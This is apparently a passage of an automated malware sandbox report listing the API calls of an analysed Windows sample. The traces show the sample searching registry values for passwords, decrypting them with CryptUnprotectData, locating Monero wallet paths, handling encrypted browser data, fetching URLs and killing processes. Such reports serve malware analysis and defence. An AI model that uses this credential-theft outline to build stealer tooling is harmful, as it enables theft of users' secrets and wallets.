                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 4fc3ed7d428f2da144111812ca26bf361c1c872d4580a85cb4545a4fe64f3ef5
                                • Instruction ID: 355ba86033673ed9158c5fac567bb9241c72145fcff42c0510ea95989e045cee
                                • Opcode Fuzzy Hash: 4fc3ed7d428f2da144111812ca26bf361c1c872d4580a85cb4545a4fe64f3ef5
                                • Instruction Fuzzy Hash: C2418D71D101189BCB26EB64E848ADD73B4BF48314F5059A8FA4AB3345DB349F898FA0
                                APIs
                                  • Part of subcall function 00E477D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E47805
                                  • Part of subcall function 00E477D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00E4784A
                                  • Part of subcall function 00E477D0: StrStrA.SHLWAPI(?,Password), ref: 00E478B8
                                  • Part of subcall function 00E477D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E478EC
                                  • Part of subcall function 00E477D0: HeapFree.KERNEL32(00000000), ref: 00E478F3
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E47A90
                                • lstrcat.KERNEL32(00000000,?), ref: 00E47ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 00E47ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 00E47AF0
                                • wsprintfA.USER32 ref: 00E47B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E47B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E47B47
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E47B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: 2bfa9da0c40883acec0a8216579ddb46e5b136b631447e47862483bf3f10aff2
                                • Instruction ID: 39cddd11edbb2db20bbb8a6a37f7af765e66a266b46d0a1e3753b584b2d6643e
                                • Opcode Fuzzy Hash: 2bfa9da0c40883acec0a8216579ddb46e5b136b631447e47862483bf3f10aff2
                                • Instruction Fuzzy Hash: F631F872E00214EFCB21DFA4E8489AFB7BAEB84314B145919F589B3244DB75ED00DBE0
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E5820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E58243
                                • lstrlen.KERNEL32(00000000), ref: 00E58260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E58297
                                • lstrlen.KERNEL32(00000000), ref: 00E582B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E582EB
                                • lstrlen.KERNEL32(00000000), ref: 00E58308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E58337
                                • lstrlen.KERNEL32(00000000), ref: 00E58351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E58380
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: ae7fe6d790b95226a7430ec762c8c78b68eaf2a5fc71fd72584901828314635c
                                • Instruction ID: 4936f7f5d3ce5947c43988ad65b2b9b2523e0ef13772888de2aab011d954c3bd
                                • Opcode Fuzzy Hash: ae7fe6d790b95226a7430ec762c8c78b68eaf2a5fc71fd72584901828314635c
                                • Instruction Fuzzy Hash: D751A0709006029BDB24DF28EA58A6AB7E4EF44711F019968FE46FB344DB30ED54CBE0
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E47805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00E4784A
                                • StrStrA.SHLWAPI(?,Password), ref: 00E478B8
                                  • Part of subcall function 00E47750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E4775E
                                  • Part of subcall function 00E47750: RtlAllocateHeap.NTDLL(00000000), ref: 00E47765
                                  • Part of subcall function 00E47750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E4778D
                                  • Part of subcall function 00E47750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00E477AD
                                  • Part of subcall function 00E47750: LocalFree.KERNEL32(?), ref: 00E477B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E478EC
                                • HeapFree.KERNEL32(00000000), ref: 00E478F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00E47A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: 61735710654f2f28a80ae7baeca9cf4272a1312a2ae044afd2e0e2692dcd2967
                                • Instruction ID: 815522e0c4eb1d667eed25f3291f64233d77a5ffcf794ec75cc4576bd5ba0e01
                                • Opcode Fuzzy Hash: 61735710654f2f28a80ae7baeca9cf4272a1312a2ae044afd2e0e2692dcd2967
                                • Instruction Fuzzy Hash: 47713EB1D0021DABDB10DF95DC84AEEB7B9EF48300F14556AE649F7200EB356E85CBA0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E41135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E4113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00E41159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00E41173
                                • RegCloseKey.ADVAPI32(?), ref: 00E4117D
                                Strings
                                • wallet_path, xrefs: 00E4116D
                                • SOFTWARE\monero-project\monero-core, xrefs: 00E4114F
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: bab81678a5f77e7794fdd69c88d2bb5e25bae95873d9756f15bda11024747b87
                                • Instruction ID: 7a7cd5bbe6593d58cffc0e2a27f68b32ee7c0c58caba23334d8f0c4a745f6b6e
                                • Opcode Fuzzy Hash: bab81678a5f77e7794fdd69c88d2bb5e25bae95873d9756f15bda11024747b87
                                • Instruction Fuzzy Hash: 9FF01D75A40308BFD7209BA4AC4EFAA7B6CEB04729F104195FF49F2284E6B55A4487E0
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 00E49E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 00E49E42
                                • LocalAlloc.KERNEL32(00000040), ref: 00E49EA7
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                • lstrcpy.KERNEL32(00000000,00E74C48), ref: 00E49FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: 4afdcfc0f8d6d9d593bc0476a8578f0f2926c66d72e8a0439aa8d2575e9f498e
                                • Instruction ID: 719136cab15df8a6076c5da4b3f91eb851895327f615314601b127f1217d6c83
                                • Opcode Fuzzy Hash: 4afdcfc0f8d6d9d593bc0476a8578f0f2926c66d72e8a0439aa8d2575e9f498e
                                • Instruction Fuzzy Hash: 9251B071A102099BDB21EFA8EC45B9F77E4AF40358F156028FE49FB242DB70ED458B90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E4565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E45661
                                • InternetOpenA.WININET(00E6CFEC,00000000,00000000,00000000,00000000), ref: 00E45677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00E45692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00E456BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 00E456E1
                                • InternetCloseHandle.WININET(?), ref: 00E456FA
                                • InternetCloseHandle.WININET(00000000), ref: 00E45701
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 3d839e36ebbb46f3c0259ad4d3371482c84e921f077fbc6e30113562f12e98ca
                                • Instruction ID: 2185fcef4a2a97b4e116fa6fb89cc32aada4b6a5ac9a16865b8057ca1b6e9a8f
                                • Opcode Fuzzy Hash: 3d839e36ebbb46f3c0259ad4d3371482c84e921f077fbc6e30113562f12e98ca
                                • Instruction Fuzzy Hash: 08418371E00204EFDB24CF55E988FAAB7B5FF48318F1480AAE608AB295D3759941CF90
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00E64759
                                • Process32First.KERNEL32(00000000,00000128), ref: 00E64769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E6477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E6479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E647AB
                                • CloseHandle.KERNEL32(00000000), ref: 00E647B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E647C0
                                • CloseHandle.KERNEL32(00000000), ref: 00E647CB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 978be5a73479c4254301f9155a43176870c5a9e5246ab8720444eb498fb2931d
                                • Instruction ID: 2765ea0770620468cf8362c8776051a2a9c60ce581efd883af475418cef7ff1b
                                • Opcode Fuzzy Hash: 978be5a73479c4254301f9155a43176870c5a9e5246ab8720444eb498fb2931d
                                • Instruction Fuzzy Hash: 4E01B971A41214AFE7315F60AC8DFEA777CEB047A5F001196FA49F10C5EB799D808BA0
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E58435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5846C
                                • lstrlen.KERNEL32(00000000), ref: 00E584B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E584E9
                                • lstrlen.KERNEL32(00000000), ref: 00E584FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5852E
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E5853E
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c76cfc5528ac2d4be74e5f131945fea313d71c7cb545a5994cffda2257e2b124
                                • Instruction ID: c1af7d62d390f9635cc5eface100c4b8331c48e20f452c806d65399d216b06bc
                                • Opcode Fuzzy Hash: c76cfc5528ac2d4be74e5f131945fea313d71c7cb545a5994cffda2257e2b124
                                • Instruction Fuzzy Hash: 0151C2719002029FCB24DF29DA84A9BB7F5EF48304F14A81DEC86FB245EB31E945CB50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E62925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E6292C
                                • RegOpenKeyExA.ADVAPI32(80000002,016BB8A0,00000000,00020119,00E628A9), ref: 00E6294B
                                • RegQueryValueExA.ADVAPI32(00E628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00E62965
                                • RegCloseKey.ADVAPI32(00E628A9), ref: 00E6296F
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: b4650d5cf3e535f86037d890171af6ed5a6a266d44b7be1177847971f3de5aaa
                                • Instruction ID: 451bcc377ca0d8088f7d62434434544947962d7b5d86e9097ab2edde33bf7f05
                                • Opcode Fuzzy Hash: b4650d5cf3e535f86037d890171af6ed5a6a266d44b7be1177847971f3de5aaa
                                • Instruction Fuzzy Hash: 5B01B175A40318AFD320CBA0A859EBB7BBCEB88769F104059FF85B7244E676590487A0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E62895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E6289C
                                  • Part of subcall function 00E62910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E62925
                                  • Part of subcall function 00E62910: RtlAllocateHeap.NTDLL(00000000), ref: 00E6292C
                                  • Part of subcall function 00E62910: RegOpenKeyExA.ADVAPI32(80000002,016BB8A0,00000000,00020119,00E628A9), ref: 00E6294B
                                  • Part of subcall function 00E62910: RegQueryValueExA.ADVAPI32(00E628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00E62965
                                  • Part of subcall function 00E62910: RegCloseKey.ADVAPI32(00E628A9), ref: 00E6296F
                                • RegOpenKeyExA.ADVAPI32(80000002,016BB8A0,00000000,00020119,00E59500), ref: 00E628D1
                                • RegQueryValueExA.ADVAPI32(00E59500,016CEBA0,00000000,00000000,00000000,000000FF), ref: 00E628EC
                                • RegCloseKey.ADVAPI32(00E59500), ref: 00E628F6
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: d662351810a2d13f354abb8a901febafde582f1b1098e47fbc56f100b7e7bea8
                                • Instruction ID: 14f2f32f18f4519f8dc90bf33a79c543602c6f6d4240d2a23cb620cd4fce28ed
                                • Opcode Fuzzy Hash: d662351810a2d13f354abb8a901febafde582f1b1098e47fbc56f100b7e7bea8
                                • Instruction Fuzzy Hash: 7501A271A40208BFD7249BA4EC4DEAA776DEB44355F004159FF48F7244D676594487E0
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 00E4723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00E47279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E47280
